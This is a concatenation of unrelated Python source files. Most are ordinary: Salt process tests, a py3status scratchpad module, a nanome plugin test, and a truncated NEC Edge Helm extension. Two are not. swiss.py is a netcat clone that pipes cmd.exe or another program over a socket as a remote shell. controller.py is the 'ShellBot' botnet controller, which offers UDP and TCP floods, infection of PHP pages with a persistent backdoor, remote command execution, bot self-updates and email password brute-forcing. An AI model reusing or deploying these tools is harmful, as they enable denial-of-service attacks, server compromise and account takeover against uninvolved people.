except EOFError:
time.sleep(1)
except KeyboardInterrupt:
pass
finally:
led.stop()
GPIO.cleanup()
if __name__ == '__main__':
main()
|
test_process.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import datetime
import functools
import io
import multiprocessing
import os
import signal
import sys
import threading
import time
import warnings
import psutil
# Import salt libs
import salt.utils.platform
import salt.utils.process
# Import 3rd-party libs
from salt.ext import six
from salt.ext.six.moves import range # pylint: disable=import-error,redefined-builtin
from salt.utils.versions import warn_until_date
from tests.support.mock import patch
# Import Salt Testing libs
from tests.support.unit import TestCase, skipIf
def die(func):
"""
Add proc title
"""
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _die():
salt.utils.process.appendproctitle("test_{0}".format(name))
attrname = "die_" + name
setattr(self, attrname, _die)
self.addCleanup(delattr, self, attrname)
return wrapper
def incr(func):
"""
Increment counter
"""
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _incr(counter, num):
salt.utils.process.appendproctitle("test_{0}".format(name))
for _ in range(0, num):
counter.value += 1
attrname = "incr_" + name
setattr(self, attrname, _incr)
self.addCleanup(delattr, self, attrname)
return wrapper
def spin(func):
"""
Spin indefinitely
"""
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _spin():
salt.utils.process.appendproctitle("test_{0}".format(name))
while True:
time.sleep(1)
attrname = "spin_" + name
setattr(self, attrname, _spin)
self.addCleanup(delattr, self, attrname)
return wrapper
class TestProcessManager(TestCase):
@spin
def test_basic(self):
"""
Make sure that the process is alive 2s later
"""
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.spin_basic)
initial_pid = next(six.iterkeys(process_manager._process_map))
time.sleep(2)
process_manager.check_children()
try:
assert initial_pid == next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
@spin
def test_kill(self):
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.spin_kill)
initial_pid = next(six.iterkeys(process_manager._process_map))
# kill the child
if salt.utils.platform.is_windows():
os.kill(initial_pid, signal.SIGTERM)
else:
os.kill(initial_pid, signal.SIGKILL)
# give the OS time to give the signal...
time.sleep(0.1)
process_manager.check_children()
try:
assert initial_pid != next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
@die
def test_restarting(self):
"""
        Make sure that a process which has died gets restarted
"""
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.die_restarting)
initial_pid = next(six.iterkeys(process_manager._process_map))
time.sleep(2)
process_manager.check_children()
try:
assert initial_pid != next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
@skipIf(sys.version_info < (2, 7), "Needs > Py 2.7 due to bug in stdlib")
@incr
def test_counter(self):
counter = multiprocessing.Value("i", 0)
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.incr_counter, args=(counter, 2))
time.sleep(1)
process_manager.check_children()
time.sleep(1)
# we should have had 2 processes go at it
try:
assert counter.value == 4
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
class TestThreadPool(TestCase):
def test_basic(self):
"""
Make sure the threadpool can do things
"""
def incr_counter(counter):
counter.value += 1
counter = multiprocessing.Value("i", 0)
pool = salt.utils.process.ThreadPool()
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertTrue(sent)
time.sleep(1) # Sleep to let the threads do things
self.assertEqual(counter.value, 1)
self.assertEqual(pool._job_queue.qsize(), 0)
def test_full_queue(self):
"""
Make sure that a full threadpool acts as we expect
"""
def incr_counter(counter):
counter.value += 1
counter = multiprocessing.Value("i", 0)
# Create a pool with no workers and 1 queue size
pool = salt.utils.process.ThreadPool(0, 1)
# make sure we can put the one item in
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertTrue(sent)
# make sure we can't put more in
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertFalse(sent)
time.sleep(1) # Sleep to let the threads do things
# make sure no one updated the counter
self.assertEqual(counter.value, 0)
# make sure the queue is still full
self.assertEqual(pool._job_queue.qsize(), 1)
class TestProcess(TestCase):
def test_daemonize_if(self):
# pylint: disable=assignment-from-none
with patch("sys.argv", ["salt-call"]):
ret = salt.utils.process.daemonize_if({})
self.assertEqual(None, ret)
ret = salt.utils.process.daemonize_if({"multiprocessing": False})
self.assertEqual(None, ret)
with patch("sys.platform", "win"):
ret = salt.utils.process.daemonize_if({})
self.assertEqual(None, ret)
with patch("salt.utils.process.daemonize"), patch("sys.platform", "linux2"):
salt.utils.process.daemonize_if({})
self.assertTrue(salt.utils.process.daemonize.called)
# pylint: enable=assignment-from-none
class TestProcessCallbacks(TestCase):
@staticmethod
def process_target(evt):
evt.set()
def test_callbacks(self):
"Validate Process call after fork and finalize methods"
teardown_to_mock = "salt.log.setup.shutdown_multiprocessing_logging"
log_to_mock = "salt.utils.process.Process._setup_process_logging"
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
evt = multiprocessing.Event()
proc = salt.utils.process.Process(target=self.process_target, args=(evt,))
proc.run()
assert evt.is_set()
mb.assert_called()
ma.assert_called()
def test_callbacks_called_when_run_overriden(self):
"Validate Process sub classes call after fork and finalize methods when run is overridden"
class MyProcess(salt.utils.process.Process):
def __init__(self):
super(MyProcess, self).__init__()
self.evt = multiprocessing.Event()
def run(self):
self.evt.set()
teardown_to_mock = "salt.log.setup.shutdown_multiprocessing_logging"
log_to_mock = "salt.utils.process.Process._setup_process_logging"
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
proc = MyProcess()
proc.run()
assert proc.evt.is_set()
ma.assert_called()
mb.assert_called()
class TestSignalHandlingProcess(TestCase):
@classmethod
def Process(cls, pid):
raise psutil.NoSuchProcess(pid)
@classmethod
def target(cls):
os.kill(os.getpid(), signal.SIGTERM)
@classmethod
def children(cls, *args, **kwargs):
raise psutil.NoSuchProcess(1)
def test_process_does_not_exist(self):
try:
with patch("psutil.Process", self.Process):
proc = salt.utils.process.SignalHandlingProcess(target=self.target)
proc.start()
except psutil.NoSuchProcess:
assert False, "psutil.NoSuchProcess raised"
def test_process_children_do_not_exist(self):
try:
with patch("psutil.Process.children", self.children):
proc = salt.utils.process.SignalHandlingProcess(target=self.target)
proc.start()
except psutil.NoSuchProcess:
assert False, "psutil.NoSuchProcess raised"
@staticmethod
def run_forever_sub_target(evt):
"Used by run_forever_target to create a sub-process"
while not evt.is_set():
time.sleep(1)
@staticmethod
def run_forever_target(sub_target, evt):
"A target that will run forever or until an event is set"
p = multiprocessing.Process(target=sub_target, args=(evt,))
p.start()
p.join()
@staticmethod
def kill_target_sub_proc():
pid = os.fork()
if pid == 0:
return
pid = os.fork()
if pid == 0:
return
time.sleep(0.1)
try:
os.kill(os.getpid(), signal.SIGINT)
except KeyboardInterrupt:
pass
@skipIf(sys.platform.startswith("win"), "No os.fork on Windows")
def test_signal_processing_regression_test(self):
evt = multiprocessing.Event()
sh_proc = salt.utils.process.SignalHandlingProcess(
target=self.run_forever_target, args=(self.run_forever_sub_target, evt)
)
sh_proc.start()
proc = multiprocessing.Process(target=self.kill_target_sub_proc)
proc.start()
proc.join()
# When the bug exists, the kill_target_sub_proc signal will kill both
# processes. sh_proc will be alive if the bug is fixed
try:
assert sh_proc.is_alive()
finally:
evt.set()
sh_proc.join()
@staticmethod
def no_op_target():
pass
@staticmethod
def pid_setting_target(sub_target, val, evt):
val.value = os.getpid()
p = multiprocessing.Process(target=sub_target, args=(evt,))
p.start()
p.join()
@skipIf(sys.platform.startswith("win"), "Required signals not supported on windows")
def test_signal_processing_handle_signals_called(self):
"Validate SignalHandlingProcess handles signals"
        # Global event to stop all processes we're creating
evt = multiprocessing.Event()
# Create a process to test signal handler
val = multiprocessing.Value("i", 0)
proc = salt.utils.process.SignalHandlingProcess(
target=self.pid_setting_target,
args=(self.run_forever_sub_target, val, evt),
)
proc.start()
# Create a second process that should not respond to SIGINT or SIGTERM
proc2 = multiprocessing.Process(
target=self.run_forever_target, args=(self.run_forever_sub_target, evt),
)
proc2.start()
        # Wait for the sub process to set its pid
while not val.value:
time.sleep(0.3)
assert not proc.signal_handled()
# Send a signal that should get handled by the subprocess
os.kill(val.value, signal.SIGTERM)
# wait up to 10 seconds for signal handler:
start = time.time()
while time.time() - start < 10:
if proc.signal_handled():
break
time.sleep(0.3)
try:
            # Allow some time for the signal handler to do its thing
assert proc.signal_handled()
# Reap the signaled process
proc.join(1)
assert proc2.is_alive()
finally:
evt.set()
proc2.join(30)
proc.join(30)
class TestSignalHandlingProcessCallbacks(TestCase):
@staticmethod
def process_target(evt):
evt.set()
def test_callbacks(self):
"Validate SignalHandlingProcess call after fork and finalize methods"
teardown_to_mock = "salt.log.setup.shutdown_multiprocessing_logging"
log_to_mock = "salt.utils.process.Process._setup_process_logging"
sig_to_mock = "salt.utils.process.SignalHandlingProcess._setup_signals"
# Mock _setup_signals so we do not register one for this process.
evt = multiprocessing.Event()
with patch(sig_to_mock):
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
sh_proc = salt.utils.process.SignalHandlingProcess(
target=self.process_target, args=(evt,)
)
sh_proc.run()
assert evt.is_set()
ma.assert_called()
mb.assert_called()
def test_callbacks_called_when_run_overriden(self):
"Validate SignalHandlingProcess sub classes call after fork and finalize methods when run is overridden"
class MyProcess(salt.utils.process.SignalHandlingProcess):
def __init__(self):
super(MyProcess, self).__init__()
self.evt = multiprocessing.Event()
def run(self):
self.evt.set()
teardown_to_mock = "salt.log.setup.shutdown_multiprocessing_logging"
log_to_mock = "salt.utils.process.Process._setup_process_logging"
sig_to_mock = "salt.utils.process.SignalHandlingProcess._setup_signals"
# Mock _setup_signals so we do not register one for this process.
with patch(sig_to_mock):
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
sh_proc = MyProcess()
sh_proc.run()
assert sh_proc.evt.is_set()
ma.assert_called()
mb.assert_called()
class TestDup2(TestCase):
def test_dup2_no_fileno(self):
"The dup2 method does not fail on streams without fileno support"
f1 = io.StringIO("some initial text data")
f2 = io.StringIO("some initial other text data")
with self.assertRaises(io.UnsupportedOperation):
f1.fileno()
with patch("os.dup2") as dup_mock:
try:
salt.utils.process.dup2(f1, f2)
except io.UnsupportedOperation:
assert False, "io.UnsupportedOperation was raised"
assert not dup_mock.called
def null_target():
pass
def event_target(event):
while True:
if event.wait(5):
break
class TestProcessList(TestCase):
@staticmethod
def wait_for_proc(proc, timeout=10):
start = time.time()
while proc.is_alive():
if time.time() - start > timeout:
raise Exception("Process did not finishe before timeout")
time.sleep(0.3)
def test_process_list_process(self):
plist = salt.utils.process.SubprocessList()
proc = multiprocessing.Process(target=null_target)
proc.start()
plist.add(proc)
assert proc in plist.processes
self.wait_for_proc(proc)
assert not proc.is_alive()
plist.cleanup()
assert proc not in plist.processes
def test_process_list_thread(self):
plist = salt.utils.process.SubprocessList()
thread = threading.Thread(target=null_target)
thread.start()
plist.add(thread)
assert thread in plist.processes
self.wait_for_proc(thread)
assert not thread.is_alive()
plist.cleanup()
assert thread not in plist.processes
def test_process_list_cleanup(self):
plist = salt.utils.process.SubprocessList()
event = multiprocessing.Event()
proc = multiprocessing.Process(target=event_target, args=[event])
proc.start()
plist.add(proc)
assert proc in plist.processes
plist.cleanup()
event.set()
assert proc in plist.processes
self.wait_for_proc(proc)
assert not proc.is_alive()
plist.cleanup()
assert proc not in plist.processes
class TestDeprecatedClassNames(TestCase):
@staticmethod
def process_target():
pass
@staticmethod
def patched_warn_until_date(current_date):
def _patched_warn_until_date(
date,
message,
category=DeprecationWarning,
stacklevel=None,
_current_date=current_date,
_dont_call_warnings=False,
):
# Because we add another function in between, the stacklevel
# set in salt.utils.process, 3, needs to now be 4
stacklevel = 4
return warn_until_date(
date,
message,
category=category,
stacklevel=stacklevel,
_current_date=_current_date,
_dont_call_warnings=_dont_call_warnings,
)
return _patched_warn_until_date
def test_multiprocessing_process_warning(self):
# We *always* want *all* warnings thrown on this module
warnings.filterwarnings("always", "", DeprecationWarning, __name__)
fake_utcnow = datetime.date(2021, 1, 1)
proc = None
try:
with patch(
"salt.utils.versions.warn_until_date",
self.patched_warn_until_date(fake_utcnow),
):
# Test warning
with warnings.catch_warnings(record=True) as recorded_warnings:
proc = salt.utils.process.MultiprocessingProcess(
target=self.process_target
)
self.assertEqual(
"Please stop using 'salt.utils.process.MultiprocessingProcess' "
"and instead use 'salt.utils.process.Process'. "
"'salt.utils.process.MultiprocessingProcess' will go away "
"after 2022-01-01.",
six.text_type(recorded_warnings[0].message),
)
finally:
if proc is not None:
del proc
def test_multiprocessing_process_runtime_error(self):
fake_utcnow = datetime.date(2022, 1, 1)
proc = None
try:
with patch(
"salt.utils.versions.warn_until_date",
self.patched_warn_until_date(fake_utcnow),
):
with self.assertRaisesRegex(
RuntimeError,
r"Please stop using 'salt.utils.process.MultiprocessingProcess' "
r"and instead use 'salt.utils.process.Process'. "
r"'salt.utils.process.MultiprocessingProcess' will go away "
r"after 2022-01-01. "
r"This warning\(now exception\) triggered on "
r"filename '(.*)test_process.py', line number ([\d]+), is "
r"supposed to be shown until ([\d-]+). Today is ([\d-]+). "
r"Please remove the warning.",
):
proc = salt.utils.process.MultiprocessingProcess(
target=self.process_target
)
finally:
if proc is not None:
del proc
def test_signal_handling_multiprocessing_process_warning(self):
# We *always* want *all* warnings thrown on this module
warnings.filterwarnings("always", "", DeprecationWarning, __name__)
fake_utcnow = datetime.date(2021, 1, 1)
proc = None
try:
with patch(
"salt.utils.versions.warn_until_date",
self.patched_warn_until_date(fake_utcnow),
):
# Test warning
with warnings.catch_warnings(record=True) as recorded_warnings:
proc = salt.utils.process.SignalHandlingMultiprocessingProcess(
target=self.process_target
)
self.assertEqual(
"Please stop using 'salt.utils.process.SignalHandlingMultiprocessingProcess' "
"and instead use 'salt.utils.process.SignalHandlingProcess'. "
"'salt.utils.process.SignalHandlingMultiprocessingProcess' will go away "
"after 2022-01-01.",
six.text_type(recorded_warnings[0].message),
)
finally:
if proc is not None:
del proc
def test_signal_handling_multiprocessing_process_runtime_error(self):
fake_utcnow = datetime.date(2022, 1, 1)
proc = None
try:
with patch(
"salt.utils.versions.warn_until_date",
self.patched_warn_until_date(fake_utcnow),
):
with self.assertRaisesRegex(
RuntimeError,
r"Please stop using 'salt.utils.process.SignalHandlingMultiprocessingProcess' "
r"and instead use 'salt.utils.process.SignalHandlingProcess'. "
r"'salt.utils.process.SignalHandlingMultiprocessingProcess' will go away "
r"after 2022-01-01. "
r"This warning\(now exception\) triggered on "
r"filename '(.*)test_process.py', line number ([\d]+), is "
r"supposed to be shown until ([\d-]+). Today is ([\d-]+). "
r"Please remove the warning.",
):
proc = salt.utils.process.SignalHandlingMultiprocessingProcess(
target=self.process_target
)
finally:
if proc is not None:
del proc
|
swiss.py
|
import socket,os,threading,sys
import subprocess as sub
def usage():
print("nc.py [target] [port] [-e destanation] {-h] [-l]")
if "-h" in sys.argv:
usage()
exit()
try:
target = sys.argv[1]
port = int(sys.argv[2])
except:
usage()
exit()
listen = ("-l" in sys.argv)
execute = False
if("-e" in sys.argv):
execute = True
try:
program = sys.argv[sys.argv.index("-e")+1]
except:
program = ["\\windows\\system32\\cmd.exe"]
def recieve_data(s, p):
    # receives data from the client, server or shell
global execute
while True:
data = ""
while "\n" not in data:
            data += s.recv(1024).decode()  # accumulate until a full line is received
if(execute):
p.stdin.write(data.encode())
p.stdin.flush()
else:
print(data)
def send_data(s,p):
#sends data to server/client
global execute
while True:
if(execute):
data = ""
while "\n" not in data:
data += p.stdout.read(1).decode()
s.send(data.encode())
else:
s.send((input(">") + "\n").encode())
if(execute):
shell = sub.Popen(program, stdin=sub.PIPE, stderr=sub.STDOUT, stdout=sub.PIPE)
else:
shell = "none"
if(not listen):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,port))
except Exception as e:
s.close()
print(e)
else:
try:
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target,port))
print("Listening on {}".format((target,port)))
server.listen(3)
s, addr = server.accept()
print("Got connection: {}".format(addr))
except Exception as e:
server.close()
print(e)
#threads
thread1 = threading.Thread(target=recieve_data, args=(s,shell))
thread2 = threading.Thread(target=send_data, args=(s,shell))
thread1.start()
thread2.start()
|
controller.py
|
#!/usr/bin/env python3
# MIT License
##
# Copyright (c) 2017 Sayak Brahmachari
##
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
##
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
##
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import os
import sys
import socket
import re
import threading
about = r"""\
____ ____ ____ ____ ____ ____ ____ ____
||S |||h |||e |||l |||l |||B |||o |||t ||
||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
Coded by: Sayak Brahmachari
GitHub: https://github.com/sayak-brm
Website: http://mctrl.ml
"""
usage = "Usage: client.py <server ip> <server bridge port> <password>"
commands = """
Primary:
--------
refresh | Refresh connections
list | List connections
clear | Clear the console
quit | Close all connections and quit
about | Display program details
help | Show this message
Client Interaction:
-------------------
interact <id> | Interact with client
rawexec <command> | Execute a binary and pipe the raw I/O to the
controller. (Unstable)
stop | Stop interacting with client
udpflood <ip>:<port> | UDP flood with client
tcpflood <ip>:<port> | TCP flood with client
setbackdoor <web dir> | Infects all PHP Pages with Malicious Code that will
run the ShellBot Client (if killed) again. (Linux)
rmbackdoor <web dir> | Removes the Malicious PHP Code. (linux)
Note: Commands sent to clients must not contain semi-colons (;) except when
combining multiple lines or within quotes.
Wide Commands:
--------------
udpfloodall <ip>:<port> | Same as `udpflood` but for All clients
tcpfloodall <ip>:<port> | Same as `tcpflood` but for All clients
selfupdateall | Update all Clients with the new version from Github
Bruteforce:
-----------
gmailbruteforce <email>:<keys>:<min>:<max>
yahoobruteforce <email>:<keys>:<min>:<max>
livebruteforce <email>:<keys>:<min>:<max>
aolbruteforce <email>:<keys>:<min>:<max>
Example: gmailbruteforce someone@gmail.com:0123456789:6:8
custombruteforce <address>:<port>:<email>:<keys>:<min>:<max>
Example: custombruteforce smtp.example.com:587:user@example.com:abcdefghi:4:6
"""
# Helper Functions
def send_msg(sock, sem):
while True:
data = sys.stdin.readline()
if sem.acquire(False):
return
sock.send(bytes(data, 'utf-8'))
def recv_msg(sock):
while True:
data = sock.recv(20480).decode()
if data == 'stop':
sys.stdout.write("[Controller] - 'rawexec' finished\n")
return
sys.stdout.write(data)
def rawexec(s, command):
sem = threading.Semaphore()
sem.acquire(False)
s.send(bytes(command, 'utf-8'))
sender = threading.Thread(target=send_msg, args=(s, sem,))
recver = threading.Thread(target=recv_msg, args=(s,))
sender.daemon = True
recver.daemon = True
sender.start()
recver.start()
while threading.active_count() > 2:
pass
sem.release()
def process(s, command):
victimpath = ''
breakit = False
if command == "stop":
s.send(bytes("stop", 'utf-8'))
print("\n")
breakit = True
elif "rawexec" in command:
rawexec(s, command)
elif "cd " in command:
s.send(bytes(command, 'utf-8'))
temp = s.recv(20480).decode()
if "ERROR" not in temp:
victimpath = temp
else:
print(temp)
elif command == "":
print("[CONTROLLER] Nothing to be sent...\n")
else:
s.send(bytes(command, 'utf-8'))
print(s.recv(20480).decode())
return breakit, victimpath
def interact(s, command):
s.send(bytes(command, 'utf-8'))
temporary = s.recv(20480).decode()
if "ERROR" not in temporary:
victimpath = s.recv(20480).decode()
if "ERROR" not in victimpath:
breakit = False
while not breakit:
msg = input(victimpath)
allofem = re.split(''';(?=(?:[^'"]|'[^']*'|"[^"]*")*$)''', msg)
for onebyone in allofem:
breakit, path = process(s, onebyone)
if not path == '':
victimpath = path
else:
print(victimpath)
return
else:
print(temporary)
def run(s):
try:
while True:
command = input("SB> ")
            if command.strip() == '': pass
elif command == "refresh":
s.send(bytes("refresh", 'utf-8'))
print(s.recv(20480).decode())
elif command == "list":
s.send(bytes("list", 'utf-8'))
print(s.recv(20480).decode())
elif "interact " in command:
interact(s, command)
elif "udpfloodall " in command or "tcpfloodall " in command:
s.send(bytes(command, 'utf-8'))
elif command == "selfupdateall":
s.send(bytes("selfupdateall", 'utf-8'))
elif command == "clear":
if sys.platform == 'win32':
os.system("cls")
else:
os.system("clear")
elif command == "quit":
s.send(bytes("quit", 'utf-8'))
s.close()
return
elif command == "help":
print(usage, commands)
elif command == "about":
print(about)
else:
print("[CONTROLLER] Invalid Command")
except KeyboardInterrupt:
try:
s.send(bytes("quit", 'utf-8'))
s.close()
except Exception:
pass
print("")
return
except Exception as ex:
print("[CONTROLLER] Connection Closed Due to Error:", ex)
s.close()
return
def main():
print(about)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
except Exception:
sys.exit("[ERROR] Can't connect to server")
s.send(bytes(password, 'utf-8'))
run(s)
if __name__ == "__main__":
if len(sys.argv) == 4:
host = sys.argv[1]
port = int(sys.argv[2])
password = sys.argv[3]
elif len(sys.argv) == 2 and sys.argv[1] in ['-h', '--help']:
print(usage, commands)
else:
# sys.exit(usage)
print(usage)
host = '127.0.0.1'
port = 9090
password = '1234'
print("Using default values - {}:{}, password:{}".format(host, port, password))
main()
|
scratchpad.py
|
# -*- coding: utf-8 -*-
"""
Display number of scratchpad windows and urgency hints.
Configuration parameters:
cache_timeout: refresh interval for i3-msg or swaymsg (default 5)
format: display format for this module
(default "\u232b [\?color=scratchpad {scratchpad}]")
thresholds: specify color thresholds to use
(default [(0, "darkgray"), (1, "violet")])
Format placeholders:
{scratchpad} number of scratchpads
{urgent} number of urgent scratchpads
Color thresholds:
xxx: print a color based on the value of `xxx` placeholder
Optional:
i3ipc: an improved python library to control i3wm and sway
Examples:
```
# hide zero scratchpad
scratchpad {
format = '[\?not_zero \u232b [\?color=scratchpad {scratchpad}]]'
}
# hide non-urgent scratchpad
scratchpad {
format = '[\?not_zero \u232b {urgent}]'
}
# bring up scratchpads on clicks
scratchpad {
on_click 1 = 'scratchpad show'
}
# add more colors
scratchpad {
thresholds = [
(0, "darkgray"), (1, "violet"), (2, "deepskyblue"), (3, "lime"),
(4, "yellow"), (5, "orange"), (6, "red"), (7, "tomato"),
]
}
```
@author shadowprince (counter), cornerman (async)
@license Eclipse Public License (counter), BSD (async)
SAMPLE OUTPUT
[{'full_text': '\u232b '}, {'full_text': u'0', 'color': '#a9a9a9'}]
violet
[{'full_text': '\u232b '}, {'full_text': u'5', 'color': '#ee82ee'}]
urgent
[{'full_text': '\u232b URGENT 1', 'urgent': True}]
"""
STRING_ERROR = "invalid ipc `{}`"
class Ipc:
"""
"""
def __init__(self, parent):
self.parent = parent
self.setup(parent)
class I3ipc(Ipc):
"""
i3ipc - an improved python library to control i3wm and sway
"""
def setup(self, parent):
from threading import Thread
self.parent.cache_timeout = self.parent.py3.CACHE_FOREVER
self.scratchpad_data = {"scratchpad": 0, "urgent": 0}
t = Thread(target=self.start)
t.daemon = True
t.start()
def start(self):
from i3ipc import Connection
i3 = Connection()
self.update(i3)
for event in ["window::move", "window::urgent"]:
i3.on(event, self.update)
i3.main()
def update(self, i3, event=None):
leaves = i3.get_tree().scratchpad().leaves()
temporary = {
"ipc": self.parent.ipc,
"scratchpad": len(leaves),
"urgent": sum(window.urgent for window in leaves),
}
if self.scratchpad_data != temporary:
self.scratchpad_data = temporary
self.parent.py3.update()
def get_scratchpad_data(self):
return self.scratchpad_data
class Msg(Ipc):
"""
i3-msg - send messages to i3 window manager
swaymsg - send messages to sway window manager
"""
def setup(self, parent):
from json import loads
self.json_loads = loads
wm_msg = {"i3msg": "i3-msg"}.get(parent.ipc, parent.ipc)
self.tree_command = [wm_msg, "-t", "get_tree"]
def get_scratchpad_data(self):
tree = self.json_loads(self.parent.py3.command_output(self.tree_command))
leaves = self.find_scratchpad(tree).get("floating_nodes", [])
return {
"ipc": self.parent.ipc,
"scratchpad": len(leaves),
"urgent": sum([window["urgent"] for window in leaves]),
}
def find_scratchpad(self, tree):
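        # Depth-first walk of the window tree looking for the hidden
        # "__i3_scratch" workspace that holds the scratchpad windows.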
if tree.get("name") == "__i3_scratch":
return tree
for x in tree.get("nodes", []):
result = self.find_scratchpad(x)
if result:
return result
return {}
class Py3status:
"""
"""
# available configuration parameters
cache_timeout = 5
format = "\u232b [\?color=scratchpad {scratchpad}]"
thresholds = [(0, "darkgray"), (1, "violet")]
def post_config_hook(self):
# ipc: specify i3ipc, i3-msg, or swaymsg, otherwise auto
self.ipc = getattr(self, "ipc", "")
if self.ipc in ["", "i3ipc"]:
try:
from i3ipc import Connection # noqa f401
self.ipc = "i3ipc"
except Exception:
if self.ipc:
raise # module not found
self.ipc = (self.ipc or self.py3.get_wm_msg()).replace("-", "")
if self.ipc in ["i3ipc"]:
self.backend = I3ipc(self)
elif self.ipc in ["i3msg", "swaymsg"]:
self.backend = Msg(self)
else:
raise Exception(STRING_ERROR.format(self.ipc))
self.thresholds_init = self.py3.get_color_names_list(self.format)
def scratchpad(self):
scratchpad_data = self.backend.get_scratchpad_data()
for x in self.thresholds_init:
if x in scratchpad_data:
self.py3.threshold_get_color(scratchpad_data[x], x)
response = {
"cached_until": self.py3.time_in(self.cache_timeout),
"full_text": self.py3.safe_format(self.format, scratchpad_data),
}
if scratchpad_data["urgent"]:
response["urgent"] = True
return response
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
config = {"format": "\[{ipc}\] [\?color=scratchpad {scratchpad}]"}
module_test(Py3status, config=config)
|
TestAutoReload.py
|
import nanome
from multiprocessing import Process
import time
import sys
def start_process():
print("Start subproc")
sys.stdout.flush()
while True:
print("Hello")
sys.stdout.flush()
time.sleep(3)
class Test(nanome.PluginInstance):
pass
process = None
def pre_run():
print("Pre run")
sys.stdout.flush()
global process
process = Process(target=start_process)
process.start()
def post_run():
print("Post run")
sys.stdout.flush()
process.kill()
if __name__ == "__main__":
plugin = nanome.Plugin("Test Autoreload", "", "Test", False)
plugin.pre_run = pre_run
plugin.post_run = post_run
plugin.set_plugin_class(Test)
plugin.run('127.0.0.1', 8888)
|
necedge.py
|
#!/usr/bin/env python3
#
# Copyright (c) 2020 Giovanni Baggio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""NEC Edge extension."""
import os
import json
import yaml
import requests
import logging
from lightedge.managers.appmanager.helmextensions.publisher import *
from helmpythonclient.client import HelmPythonClient
broker_endpoint = "activemq-service.default.svc.cluster.local:5672"
class NECEdge(HelmPythonClient):
message_to_publish = {}
message_to_publish["apps"] = list()
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.root = dict()
self.releases = dict()
self.topic = dict()
def list(self, **kwargs):
return self._get_releases(), None
def install(self, release_name, chart_name, app_host=False, upgrade=False, **kwargs):
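        # Render the chart with `helm template`, push the resulting
        # manifests to the NEC Edge API (create or update), then publish
        # the pod IP of the new release on the AMQP broker.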
chart_dir = self.default_chart_dir
if 'chart_dir' in kwargs:
chart_dir = kwargs['chart_dir']
if app_host:
self.root[release_name] = app_host
if "195.37.154.70" in app_host:
self.topic[release_name] = "EC1.NetworkServiceIP"
else:
self.topic[release_name] = "EC2.NetworkServiceIP"
chart_path = '%s/%s' % (chart_dir, release_name)
command = [self.helm, "template", release_name, chart_path]
k8s_code, err = self._run_command(command)
json_docs = []
        yaml_docs = yaml.load_all(k8s_code, Loader=yaml.SafeLoader)
for doc in yaml_docs:
json_docs.append(doc)
if upgrade:
url = "%s/api/v1/update/app/%s" % (self.root[release_name], release_name)
response = requests.put(url, json=json_docs)
else:
url = "%s/api/v1/create/app/%s" % (self.root[release_name], release_name)
response = requests.post(url, json=json_docs)
logging.info("WITHIN INSTALL self.root %s" % (self.root))
logging.info("STATUS CODE FROM EC %s" % (response.status_code))
if response.status_code != 200:
raise ValueError("Error from NEC Edge API")
""" Getting Pod's IP address and publishing on the broker """
